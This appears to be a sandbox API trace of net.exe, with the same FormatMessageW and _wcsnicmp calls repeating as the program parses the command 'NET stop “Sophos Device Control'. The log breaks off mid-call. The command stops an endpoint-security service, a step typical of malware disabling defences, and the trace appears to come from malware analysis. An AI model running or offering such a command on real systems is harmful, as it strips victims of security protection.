lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x2e [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET COMPUTER\r\n\\\\computername {/", _MaxCount=0x1f) returned 16 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x7d [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET CONFIG SERVER\r\n[/AUTODISCON", _MaxCount=0x1f) returned 16 [0121.650] LocalFree (hMem=0x515738) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x26 [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET CONFIG\r\n[SERVER | WORKSTATI", _MaxCount=0x1f) returned 16 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 16 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x1b [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1f) returned 13 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0xbe [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET GROUP\r\n[groupname [/COMMENT", _MaxCount=0x1f) returned 12 [0121.650] LocalFree (hMem=0x515738) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x33 [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET HELP\r\ncommand\r\n -or-\r\nN", _MaxCount=0x1f) returned 11 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1f) returned 11 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0xc1 [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET LOCALGROUP\r\n[groupname [/CO", _MaxCount=0x1f) returned 7 [0121.650] LocalFree (hMem=0x515738) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x16 [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 3 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x33 [0121.650] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET SESSION\r\n[\\\\computername] [", _MaxCount=0x1f) returned 15 [0121.650] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x234 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1f) returned 12 [0121.651] LocalFree (hMem=0x515738) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x13 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START BROWSER\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START MESSENGER\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START NET LOGON\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x16 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x11 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START RPCSS\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x12 [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START SERVER\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0xf [0121.651] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START UPS\r\n", _MaxCount=0x1f) returned 14 [0121.651] LocalFree (hMem=0x513e48) returned 0x0 [0121.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x17 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1f) returned 14 [0121.652] LocalFree (hMem=0x513e48) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x18 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1f) returned 14 [0121.652] LocalFree (hMem=0x513e48) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x2a [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET STATISTICS\r\n[WORKSTATION | ", _MaxCount=0x1f) returned 14 [0121.652] LocalFree (hMem=0x513e48) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 19 [0121.652] LocalFree (hMem=0x513e48) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x58 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET TIME\r\n\r\n[\\\\computername | /", _MaxCount=0x1f) returned -1 [0121.652] LocalFree (hMem=0x515738) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x184 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET USE\r\n[devicename | *] [\\\\co", _MaxCount=0x1f) returned -2 [0121.652] LocalFree (hMem=0x515738) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xc7 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET USER\r\n[username [password |", _MaxCount=0x1f) returned -2 [0121.652] LocalFree (hMem=0x515738) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x47 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET VIEW\r\n[\\\\computername [/CAC", _MaxCount=0x1f) returned -3 [0121.652] LocalFree (hMem=0x515738) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xc2 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET\r\n [ ACCOUNTS | COMPUTER ", _MaxCount=0x1f) returned 19 [0121.652] LocalFree (hMem=0x515738) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x319 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="SERVICES\r\nNET START can be used", _MaxCount=0x1f) returned -5 [0121.652] LocalFree (hMem=0x515738) returned 0x0 [0121.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x483 [0121.652] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="SYNTAX\r\nThe following conventio", _MaxCount=0x1f) returned -5 [0121.652] LocalFree (hMem=0x515738) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xa86 [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NAMES\r\nThe following types of n", _MaxCount=0x1f) returned 4 [0121.653] LocalFree (hMem=0x515738) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x54 [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="\r\nFor more information on tools", _MaxCount=0x1f) returned 97 [0121.653] LocalFree (hMem=0x515738) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xad [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET ACCOUNTS\r\n[/FORCELO", _MaxCount=0x17) returned 18 [0121.653] LocalFree (hMem=0x515738) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x2e [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET COMPUTER\r\n\\\\compute", _MaxCount=0x17) returned 16 [0121.653] LocalFree (hMem=0x513e48) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x7d [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET CONFIG SERVER\r\n[/AU", _MaxCount=0x17) returned 16 [0121.653] LocalFree (hMem=0x515738) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x26 [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET CONFIG\r\n[SERVER | W", _MaxCount=0x17) returned 16 [0121.653] LocalFree (hMem=0x513e48) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET CONTINUE\r\nservice\r\n", _MaxCount=0x17) returned 16 [0121.653] LocalFree (hMem=0x513e48) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x1b [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET FILE\r\n[id [/CLOSE]]", _MaxCount=0x17) returned 13 [0121.653] LocalFree (hMem=0x513e48) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0xbe [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET GROUP\r\n[groupname [", _MaxCount=0x17) returned 12 [0121.653] LocalFree (hMem=0x515738) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x33 [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x17) returned 11 [0121.653] LocalFree (hMem=0x513e48) returned 0x0 [0121.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.653] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET HELPMSG\r\nmessage#\r\n", _MaxCount=0x17) returned 11 [0121.653] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0xc1 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET LOCALGROUP\r\n[groupn", _MaxCount=0x17) returned 7 [0121.654] LocalFree (hMem=0x515738) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x16 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x17) returned 3 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x33 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET SESSION\r\n[\\\\compute", _MaxCount=0x17) returned 15 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x234 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x17) returned 12 [0121.654] LocalFree (hMem=0x515738) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x13 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START BROWSER\r\n", _MaxCount=0x17) returned 14 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x17) returned 14 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START EVENTLOG\r\n", _MaxCount=0x17) returned 14 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START MESSENGER\r\n", _MaxCount=0x17) returned 14 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START NET LOGON\r\n", _MaxCount=0x17) returned 14 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x16 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x17) returned 14 [0121.654] LocalFree (hMem=0x513e48) returned 0x0 [0121.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x11 [0121.654] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START RPCSS\r\n", _MaxCount=0x17) returned 14 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START SCHEDULE\r\n", _MaxCount=0x17) returned 14 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x12 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START SERVER\r\n", _MaxCount=0x17) returned 14 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0xf [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START UPS\r\n", _MaxCount=0x17) returned 14 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x17 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START WORKSTATION\r\n", _MaxCount=0x17) returned 14 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x18 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET START\r\n[service]\r\n\r", _MaxCount=0x17) returned 14 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x2a [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET STATISTICS\r\n[WORKST", _MaxCount=0x17) returned 14 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x17) returned 19 [0121.655] LocalFree (hMem=0x513e48) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c㹈Q\x0c") returned 0x58 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET TIME\r\n\r\n[\\\\computer", _MaxCount=0x17) returned -1 [0121.655] LocalFree (hMem=0x519738) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc50, dwLanguageId=0x0, 